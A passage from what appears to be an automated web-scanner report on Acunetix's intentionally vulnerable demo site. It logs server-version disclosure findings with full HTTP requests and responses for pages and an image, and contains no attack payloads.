style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ads/acunetix.gif
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 341 bytes.	GET http://testaspnet.vulnweb.com/ads/acunetix.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ads/def.html Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:52 GMT Accept-Ranges: bytes ETag: "eb3686f99c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 3048
Response Body - size: 3,048 bytes.	GIF89a ÷å1:555øõõäääÑÑÑªªªÚÚÚiiiúÕÖä3¯®® ÒÒÒ111î\|èCJèMT¼¼¼æææáááõ²µä$-êU[þüüAAA^^^æ:Bvvv>>>§§§â!÷ââímrá ÁÁÁùÌÎºººìz···òTTTò«®íkkk¸¸¸cccmmmï ìdjÃÃÃNNN"""ñ¿Áìqvò¥§zzzttt888ñØØØÕÕÕrssfffËËËýóóùññ÷æç÷ÝÝZZZ}}}FFFDDDó»½HHHçFM---¾¿¿æBISSS%%%```&&&XXXâøÇÉxxx JJJé_e*:::©¨¨ïâêioã$â!áæ/8ä(âùùù÷÷÷øøøÿþþÿÿþÿþÿþÿÿþþÿþÿþðððeeeõõõúûúíííóóó´´´°°°ùùúûúúúúûìììñññ÷÷øôôôûûúýýý÷ø÷ïïïµµµòòòëëëêêêøø÷¤¤¤èèèÌÌÌÍÍÍßßßÈÈÈ³³³ø÷ø¡¡¡ÇÇÇîîî²²²~~~ QQQùúú¥¥¥ùúù×××ÜÜÜÏÏÏ÷øøãããÝÝÝÆÆÆLLLöÑÓpppð¢¢¢ûûüûøødddâââúÜÝíç@GÉÉÉÞÞÞþúúoooñðñòúûûOOOÝÜÝðûÝßôôõõõôúÙÚððñôÉËèHNâãâó¡îw\|î¤¨ë`fïîqxíäRQQôÆÈûßàííîóÝÞöÚÚúÏÑð°ã&ñ´¶á{{{ÅÅÅøÞßöÁÂúúùûÞßîûàâúêëùÓÔýïïöööûûûúúúþþþüüüá ÿÿÿ!ù, ÿ÷ H° Á\È°¡Ã oÁ²` `rP/O=~öé§?zòDÊÉã¾>}Æ\|Ó£>\|þå8'L0ùÀyr'A=æÙóï_Hì¹ç?=2O\ºàÓ¡Mkº¬Jðþ¤i?Jû>õsO×{\|5µûÏI=ÿ~ÁãeC,´s/ß¦æÁ9r¤ã=V¹b&iÕ©È8û(\|õsSÀ!k;§ë=û ügçß=}¬ÚÕc©²hìÞÄ¾§÷IæÚ'¬ÞÈ£AÓ¯ºuën0X@½»÷ïàÃÿO¾\|xFÀÓFÔcæÿñëîäëøñC(c>ßA(WÞ>Lòñ%Ç)äSÿázÁu'`\|F&ùuxEGÀÁÀÍhò-ÀÝÐg0TIdrxtgGòAS¨p£üSÁ.jØè§gGSh;l°Â\|ýÑ Q ¥Å2¬ðO3ìrÀ ÿ°"Ãü&d½2ÃDj7y\|HeºåÖ¬¸UHdùÀÂ¢æ d !Ý²Z4ÏhU±ÂY:cwM¬A©[V4ÿÙ¾JÉ?¸uÈ?àV%Íî@ö' JÂB¯ºe¾úóhS¢;ÐT¦þlÚé§þ©á±·@ÇIhEQ-ZÒÑÞj®M©â@6[G6uÈ&lé´XÐð9ÌÖµÿl è8¼¢ðª1È?à§ 6ÅºhEBx0ïÅ¨ S"xá¡ü CTñÏ¾híÚÔnuÐT%nÁðÏÿ¤ ðÖt¿ñê!ðZÛ&ÒuSáOY2§'kîÊn!Jd¯$ÿÊÀ¥ÿ<â[@·Hnafz4¥Óþ8ý-ä2ðÉ> åÀÈóPÂrÈ¡ðÙ9ZbwWÀ¼FâáÞó·ßjJwd(«2ËöB'[l4Õ[SxGyË%4E¡zA.ù?©TÛLôÂ)ß?Ü PÄJ:MR-à \|ñzpgxsò¹hqIw1¸õCS¸ #A¨)qqt: -´¨2ü<D Ð:yXÆ}<Ô¦XÂ-¨'õ¢Åå_Ýæ7¬amñDµPÑ8ÌawÀ 5_YÿÕÈð#¼þaÌm¨Ùá!pgnÙÛwJPG©À-J# qg·Ý¡EÌ'fø?¤g[¯ÒB×¸6 Òòmà!8Pã#Àìñ6x øÜò ðPm}`óGÉÃMÝoº£?ÐØ5ðfiÙÀ@ÊRg¨ÂþAÇ12tKÈ¡½/èða8xÈø([bÓípËð! âóÏ<½fÍ¤GÅ$Äé<hâ¢Z«ÀÇ#Ðe àcèLç þ@t¢H Y·<ã¡P´aÿLB\ÀCÛÀ:$à#b>P+"4ø¸Å ^h&&ÀcRuÐ¬'ZÚÍmvóßDK8ñÁ@´t¢øèú£ô´ç1;q:/ j3Å!&ÞªÁÒà!^Üá9p@ñÔªv ZÀSà! ªOÅG2üÑY<µWhÀ!¢%O}Ä6ñÖ§-xª'jÅÔõhAªÂUþ ÂZR<¬2hÙf<âPÖÑ.x(¤Àº! Il!QþØA91 pbpYÅ$°¡·ÿ 8´ØDoýaGL`8°©?< F4bs ni%A»¾ØM&Z"à¡ÕÐlýÑ<Â¹p4QZ4vÀC-¾èRój-AhD Ú¡aà! »Î þæ§xH0,(Å5-H0Q¶(!ûqñFÀb(±Í;HXÂÖ¥OEEÀU°!ZvSÀhéÐQ$¸µ &Lô xh\|` Àý A ìP¢æç vÈ²~ZJyÕ2íPnË8³tP6EEÿc&1Z<5Û!ÕêÁ'8nÒvnÀx¿`ûcvFm=1Á-;@ÖúDH! ë\ D<:ù¡Ô t2@%D 3 c¶,Ô`1c0ÁZ®t À}nW°+m\|´Æâ¡fZxAxQ [ E,*k;dÆ@À1±V£vXv`¨9U@Àkdú:qÐ>ö)\AOà·>&7\àEP¡ ìûø¾ïK4áH 2AñS 8(Ðq}\"âÅè8">@©8Â( 0;\à(ÆÃ#þ\|xçø ø#ôNèãø!Á<ô¦ßÜÉø¹À9ø-ªÜêú¨º (nuEx}ß_¿¹Ó~sªoß^Çú¾µ¬ìÜõ¡¹âsï83Þ\|äÄ²à¿þðÏÇ;F 8\ÀºH¼ä'OùÊ[þòÏ¼æ7?y<ðãó ½èGOúÒþô¨O½êWÏúÖ»þõ°½ìgOûÚÇ> ;
URL	http://testaspnet.vulnweb.com/ads/def.html
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 363 bytes.	GET http://testaspnet.vulnweb.com/ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 246 bytes.	HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Fri, 24 May 2019 07:50:37 GMT Accept-Ranges: bytes ETag: "eb6cf45f512d51:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 488
Response Body - size: 488 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title></title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1"> <meta name="ProgId" content="VisualStudio.HTML"> <meta name="Originator" content="Microsoft Visual Studio .NET 7.1"> </head> <body> <P align="center"><STRONG>Is your website hackable?<BR> check with<BR> <IMG src="acunetix.gif"><BR> Web Vulnerability Scanner</STRONG></P> </body> </html>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13859
Response Body - size: 13,859 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV 